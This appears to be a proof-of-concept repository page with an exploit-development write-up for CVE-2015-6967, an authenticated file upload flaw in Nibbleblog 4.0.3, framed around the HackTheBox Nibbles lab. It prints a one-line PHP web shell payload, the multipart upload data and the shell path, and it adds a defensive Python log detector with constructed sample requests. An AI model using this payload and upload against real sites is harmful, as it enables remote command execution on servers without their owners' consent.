POC details: f1e0522372f94508d3e20700ee72c42dcda6a78c

Source
Associated vulnerability
Title: Nibbleblog code injection vulnerability (CVE-2015-6967)
Description: NibbleBlog is a blog engine. Versions of Nibbleblog before 4.0.5 contain an arbitrary file upload vulnerability in the My Image plugin. A remote attacker can exploit it to execute arbitrary code by uploading an executable file and then sending a direct request for that file.
Introduction
# ExploitDev Journey #9 | CVE-2015-6967 | Nibbleblog 4.0.3 - Arbitrary File Upload
Original Exploit: https://www.exploit-db.com/exploits/38489 <br>

**Exploit name:** Nibbleblog 4.0.3 RCE <br>
**CVE**: 2015-6967 <br>
**Lab**: Nibbles - HackTheBox


### Description
There is a flaw in Nibbleblog 4.0.3 that allows an authenticated user to upload shells. Uploading a shell here is a little different from what you have seen before: you can name your file `r57.php`, but the name does not matter, because the upload can only be reached through `image.php`. It looks as if you were overwriting the contents of `image.php` with your payload, but that is not quite what happens: you upload a file under whatever name you like, and you can only access it under the name `image.php`.

<br>

### How it works
In this session you won't need the `gen_random_charset()` function, because there is no point in giving your shell a unique name. Here is how it works:
- You authenticate to the website using a username and password
- You upload an image through the plugins section of Nibbleblog
- You open your shell and do business as usual

<br>

### Writing the exploit
First we define some important variables:
```py
login_url = f'{rhost}/nibbleblog/admin.php'
image_url = f"{rhost}/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image"
payload = '<?php echo shell_exec($_GET["rce"]); ?>'
shell_path = f"{rhost}/nibbleblog/content/private/plugins/my_image/image.php"
```

You are familiar with all of them, except that `shell_path` now opens `image.php` rather than a file named with a random charset. <br>
You were already introduced to session management in Python and you already know how to log in to an application; this application is no different from what you have seen before.

The POST data that you are going to send is kind of long and might look odd to you:
```py
# Multipart fields in the tuple form used by the requests library's files= argument:
# (None, value) sends a plain form field, the 4-tuple is the uploaded file itself.
data = {
    "plugin": (None, 'my_image'), "title": (None, 'My image'), "position": (None, 4), "caption": "",
    "image": ('doesnt_matter.php', payload, "application/x-php", {'Content-Disposition': 'form-data'}),
    "image_resize": (None, 1), "image_width": (None, 200), "image_height": (None, 200), "image_option": (None, 'auto')
}
```

The reason is that the application expects the other fields of the plugin configuration form as well, such as the image title, position, caption, height and width. The rest of the exploit is self-explanatory and should be easy for you to understand.
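From the defender's side, the two requests described above leave a recognisable trace in the web server log: a POST to the My Image plugin configuration endpoint, then a direct request to `content/private/plugins/my_image/image.php` carrying a query string (the payload reads `$_GET`). The detector below is an added example, not part of the original exploit or of Nibbleblog; the access-log lines, IP addresses and severity labels are constructed.

```python
import re

# Constructed Apache-style access-log lines (sample data, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jan/2018:10:00:01 +0000] "POST /nibbleblog/admin.php HTTP/1.1" 302 0
10.0.0.5 - - [08/Jan/2018:10:00:03 +0000] "POST /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image HTTP/1.1" 200 5123
10.0.0.5 - - [08/Jan/2018:10:00:05 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php?rce=id HTTP/1.1" 200 61
10.0.0.7 - - [08/Jan/2018:10:02:00 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php?rce=whoami HTTP/1.1" 200 7
10.0.0.9 - - [08/Jan/2018:10:05:00 +0000] "GET /nibbleblog/index.php HTTP/1.1" 200 2048
10.0.0.9 - - [08/Jan/2018:10:05:02 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_PATH = "/nibbleblog/admin.php"      # plugin config endpoint that receives the upload
UPLOAD_MARKER = "plugin=my_image"
SHELL_PATH = "/nibbleblog/content/private/plugins/my_image/image.php"


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Return (ip, severity, request target) for suspicious requests to image.php.

    'high'  : the same client earlier POSTed to the My Image plugin config page
              (the upload step) and then fetched image.php with a query string.
    'medium': image.php was fetched with a query string, but no matching upload
              POST was seen from that client (rotated log, other IP, etc.).
    A plain fetch of image.php without parameters is normal image viewing.
    """
    uploaders = set()
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path, _, query = rec["target"].partition("?")
        if rec["method"] == "POST" and path == UPLOAD_PATH and UPLOAD_MARKER in query:
            uploaders.add(rec["ip"])
        elif path == SHELL_PATH and query:
            severity = "high" if rec["ip"] in uploaders else "medium"
            findings.append((rec["ip"], severity, rec["target"]))
    return findings
```

On a real server the `uploaders` set should be keyed on the authenticated session rather than the client IP, since the upload itself requires admin credentials.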

<br>

### Final thoughts
In this exploit development session you learned that not all applications let you upload files under a custom name. Some applications work differently, and this web app is one of them: we had no say in choosing the name, since our file is served as `image.php`, which is fine. In the end, all we need is the shell.
File snapshot

```
[4.0K] /data/pocs/f1e0522372f94508d3e20700ee72c42dcda6a78c
├── [2.4K] exploit.py
└── [2.8K] README.md

0 directories, 2 files
```